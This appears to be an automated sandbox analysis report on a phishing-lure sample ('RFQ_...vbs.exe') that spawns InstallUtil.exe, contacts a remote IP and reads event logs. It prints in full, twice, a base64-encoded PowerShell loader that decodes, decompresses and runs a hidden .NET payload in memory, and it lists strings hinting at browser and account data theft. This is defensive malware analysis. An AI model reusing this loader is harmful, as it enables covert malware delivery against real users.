Source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2011025718.00000000053F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2045039920.0000000009990000.00000004.08000000.00040000.00000000.sdmp, RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2024331201.0000000006DFD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2045039920.0000000009990000.00000004.08000000.00040000.00000000.sdmp, RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2024331201.0000000006DFD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2071800372.000000000364C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2045039920.0000000009990000.00000004.08000000.00040000.00000000.sdmp, RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2024331201.0000000006DFD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: InstallUtil.exe, 00000008.00000002.2063750110.0000000002624000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2063750110.000000000282E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://icanhazip.com/
Source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2024331201.000000000630D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2045039920.0000000009990000.00000004.08000000.00040000.00000000.sdmp, RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2024331201.0000000006DFD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2011025718.0000000005606000.00000004.00000800.00020000.00000000.sdmp, RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2045039920.0000000009990000.00000004.08000000.00040000.00000000.sdmp, RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2024331201.0000000006DFD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2063750110.0000000002541000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2045039920.0000000009990000.00000004.08000000.00040000.00000000.sdmp, RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2024331201.0000000006DFD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: InstallUtil.exe, 00000008.00000002.2063750110.0000000002624000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2063750110.000000000282E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/
Source: InstallUtil.exe, 00000008.00000002.2063750110.0000000002761000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: InstallUtil.exe, 00000008.00000002.2063750110.0000000002761000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefox
Source: InstallUtil.exe, 00000008.00000002.2063750110.0000000002A84000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id
Source: InstallUtil.exe, 00000008.00000002.2085803769.0000000007B71000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2085803769.0000000008EF8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2063750110.0000000002761000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2071800372.00000000036E6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2085410253.00000000069F1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2063750110.0000000002A84000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: InstallUtil.exe, 00000008.00000002.2063750110.0000000002624000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016$=
Source: InstallUtil.exe, 00000008.00000002.2087150967.0000000009E71000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2085803769.0000000007B71000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2085803769.0000000008EF8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2063750110.0000000002ADC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2063750110.0000000002761000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2071800372.00000000036E6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2085410253.00000000069F1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2063750110.0000000002A84000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: InstallUtil.exe, 00000008.00000002.2063750110.0000000002624000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17$=
Source: InstallUtil.exe, 00000008.00000002.2063750110.0000000002ADC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2t
Source: InstallUtil.exe, 00000008.00000002.2063750110.0000000002761000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: InstallUtil.exe, 00000008.00000002.2063750110.0000000002761000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: InstallUtil.exe, 00000008.00000002.2063750110.0000000002761000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privac
Source: InstallUtil.exe, 00000008.00000002.2063750110.0000000002761000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2071800372.00000000036E6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2085410253.00000000069F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: InstallUtil.exe, 00000008.00000002.2063750110.0000000002761000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: InstallUtil.exe, 00000008.00000002.2063750110.0000000002761000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443

Source: unknown

HTTPS traffic detected: 51.159.14.89:443 -> 192.168.2.4:49730 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

E-Banking Fraud

Malicious encrypted Powershell command line found

Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe "C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe" -enc JABBAG4AbwB2AHAAdABzAHMAaQBqACAAPQAgAFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkALgBNAGEAaQBuAE0AbwBkAHUAbABlAC4ARgBpAGwAZQBOAGEAbQBlAC4AUgBlAHAAbABhAGMAZQAoACcALgBlAHgAZQAnACwAJwAnACkAOwAkAFAAYgBzAHEAcAAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEEAbgBvAHYAcAB0AHMAcwBpAGoAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ATABhAHMAdAAgADEAOwAgACQAUQB5AHkAaQB0AHQAdwBmAGIAdgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABQAGIAcwBxAHAALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAQAAnACwAIAAnAEEAJwApACkAOwAkAEYAeABnAGoAYQB0AGIAeQBjAGIAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAFEAeQB5AGkAdAB0AHcAZgBiAHYAIAApADsAJABSAGIAbQB3AGUAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AOwAkAFoAawBuAGoAbwBrAHEAZQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACAAJABGAHgAZwBqAGEAdABiAHkAYwBiACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApADsAJABaAGsAbgBqAG8AawBxAGUALgBDAG8AcAB5AFQAbwAoACAAJABSAGIAbQB3AGUAIAApADsAJABaAGsAbgBqAG8AawBxAGUALgBDAGwAbwBzAGUAKAApADsAJABGAHgAZwBqAGEAdABiAHkAYwBiAC4AQwBsAG8AcwBlACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAgACQAUQB5AHkAaQB0AHQAdwBmAGIAdgAgAD0AIAAkAFIAYgBtAHcAZQAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQAUQB5AHkAaQB0AHQAdwBmAGIAdgApADsAIAAkAEoAegBrAGwAcgBvAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABRAHkAeQBpAHQAdAB3AGYAYgB2ACkAOwAgACQAUQBtAHIAZwBjAGQAZQBqACAAPQAgACQASgB6AGsAbAByAG8AcwAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAFEAbQByAGcAYwBkAGUAagAuAEQAZQBjAGwAYQByAGkAbgBnAFQAeQBwAGUALAAgACQAUQBtAHIAZwBjAGQAZQBqAC4ATgBhAG0AZQApAC4ARAB5AG4AYQBtAGkAYwBJAG4AdgBvAGsAZQAoACkAIAB8ACAATwB1AHQALQBOAHUAbABsAA==
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe "C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe" -enc JABBAG4AbwB2AHAAdABzAHMAaQBqACAAPQAgAFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkALgBNAGEAaQBuAE0AbwBkAHUAbABlAC4ARgBpAGwAZQBOAGEAbQBlAC4AUgBlAHAAbABhAGMAZQAoACcALgBlAHgAZQAnACwAJwAnACkAOwAkAFAAYgBzAHEAcAAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEEAbgBvAHYAcAB0AHMAcwBpAGoAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ATABhAHMAdAAgADEAOwAgACQAUQB5AHkAaQB0AHQAdwBmAGIAdgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABQAGIAcwBxAHAALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAQAAnACwAIAAnAEEAJwApACkAOwAkAEYAeABnAGoAYQB0AGIAeQBjAGIAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAFEAeQB5AGkAdAB0AHcAZgBiAHYAIAApADsAJABSAGIAbQB3AGUAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AOwAkAFoAawBuAGoAbwBrAHEAZQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACAAJABGAHgAZwBqAGEAdABiAHkAYwBiACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApADsAJABaAGsAbgBqAG8AawBxAGUALgBDAG8AcAB5AFQAbwAoACAAJABSAGIAbQB3AGUAIAApADsAJABaAGsAbgBqAG8AawBxAGUALgBDAGwAbwBzAGUAKAApADsAJABGAHgAZwBqAGEAdABiAHkAYwBiAC4AQwBsAG8AcwBlACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAgACQAUQB5AHkAaQB0AHQAdwBmAGIAdgAgAD0AIAAkAFIAYgBtAHcAZQAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQAUQB5AHkAaQB0AHQAdwBmAGIAdgApADsAIAAkAEoAegBrAGwAcgBvAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABRAHkAeQBpAHQAdAB3AGYAYgB2ACkAOwAgACQAUQBtAHIAZwBjAGQAZQBqACAAPQAgACQASgB6AGsAbAByAG8AcwAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAFEAbQByAGcAYwBkAGUAagAuAEQAZQBjAGwAYQByAGkAbgBnAFQAeQBwAGUALAAgACQAUQBtAHIAZwBjAGQAZQBqAC4ATgBhAG0AZQApAC4ARAB5AG4AYQBtAGkAYwBJAG4AdgBvAGsAZQAoACkAIAB8ACAATwB1AHQALQBOAHUAbABsAA==			Jump to behavior

Spam, unwanted Advertisements and Ransom Demands

Reads the Security eventlog

Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior

Reads the System eventlog

Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShell	Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: Process Memory Space: RFQ_43200046412000086500125.vbs.exe PID: 7728, type: MEMORYSTR

Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}	Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}	Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}	Jump to behavior

Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 3_2_074AA860 NtResumeThread,		3_2_074AA860
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 3_2_074AA858 NtResumeThread,		3_2_074AA858

Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 3_2_0518C644	3_2_0518C644
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 3_2_0518C0FC	3_2_0518C0FC
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 3_2_0518B5AE	3_2_0518B5AE
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 3_2_0518F690	3_2_0518F690
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 3_2_0518BD9C	3_2_0518BD9C
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 3_2_0518B800	3_2_0518B800
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 3_2_074A26D8	3_2_074A26D8
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 3_2_074A3598	3_2_074A3598
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 3_2_074A26C8	3_2_074A26C8
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 3_2_074A3588	3_2_074A3588
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 3_2_074A5B87	3_2_074A5B87
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 3_2_074A5B98	3_2_074A5B98
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 3_2_09872590	3_2_09872590
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 3_2_0987257F	3_2_0987257F
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 3_2_09874481	3_2_09874481
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 3_2_09874490	3_2_09874490
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 3_2_0993DE38	3_2_0993DE38
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 3_2_099419A3	3_2_099419A3
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 3_2_09940040	3_2_09940040
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 3_2_09946CB8	3_2_09946CB8
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 3_2_09946CC8	3_2_09946CC8
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 3_2_09940006	3_2_09940006
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 3_2_0994CC50	3_2_0994CC50
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 3_2_0994CC40	3_2_0994CC40
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 3_2_09945AD8	3_2_09945AD8
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 3_2_09945AE8	3_2_09945AE8
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 3_2_09A29888	3_2_09A29888
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 3_2_09A29402	3_2_09A29402
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 3_2_09A29410	3_2_09A29410
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 3_2_09A20011	3_2_09A20011
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 3_2_09A20040	3_2_09A20040
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 3_2_09A27449	3_2_09A27449
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 3_2_09A27450	3_2_09A27450
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 3_2_09A27EE0	3_2_09A27EE0
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 3_2_09A27EF0	3_2_09A27EF0
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 3_2_09B60006	3_2_09B60006
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 3_2_09B61047	3_2_09B61047
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 3_2_09D90040	3_2_09D90040
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 3_2_09D90019	3_2_09D90019
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_00991058	8_2_00991058
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_00991048	8_2_00991048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_04BB2B68	8_2_04BB2B68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_04BB2B49	8_2_04BB2B49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_04CE36A8	8_2_04CE36A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_04CE026F	8_2_04CE026F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_04CE05A7	8_2_04CE05A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_04CE1318	8_2_04CE1318
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_04CF5488	8_2_04CF5488
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_04CF0D50	8_2_04CF0D50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_04CF6610	8_2_04CF6610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_04CF5478	8_2_04CF5478
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_04CF85D7	8_2_04CF85D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_04CF85F8	8_2_04CF85F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_04CF6601	8_2_04CF6601
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_04D194D8	8_2_04D194D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_04D19C4E	8_2_04D19C4E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_04D14888	8_2_04D14888
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_04D194C8	8_2_04D194C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_04D18D40	8_2_04D18D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_04D18D30	8_2_04D18D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_04D14879	8_2_04D14879
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_050A4718	8_2_050A4718
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_050AAC68	8_2_050AAC68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_050A3AC0	8_2_050A3AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_050A470B	8_2_050A470B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_050AAC82	8_2_050AAC82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_050D4678	8_2_050D4678
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_050D7488	8_2_050D7488
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_050D1270	8_2_050D1270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_050D52E1	8_2_050D52E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_050D7D98	8_2_050D7D98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_050D3A60	8_2_050D3A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_050D0570	8_2_050D0570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_050D0580	8_2_050D0580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_050DAF27	8_2_050DAF27
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_050DAF38	8_2_050DAF38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_050D1562	8_2_050D1562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_050D7478	8_2_050D7478
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_050D14BB	8_2_050D14BB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_050D52E1	8_2_050D52E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_050D1327	8_2_050D1327
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_050D1370	8_2_050D1370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_050D1260	8_2_050D1260
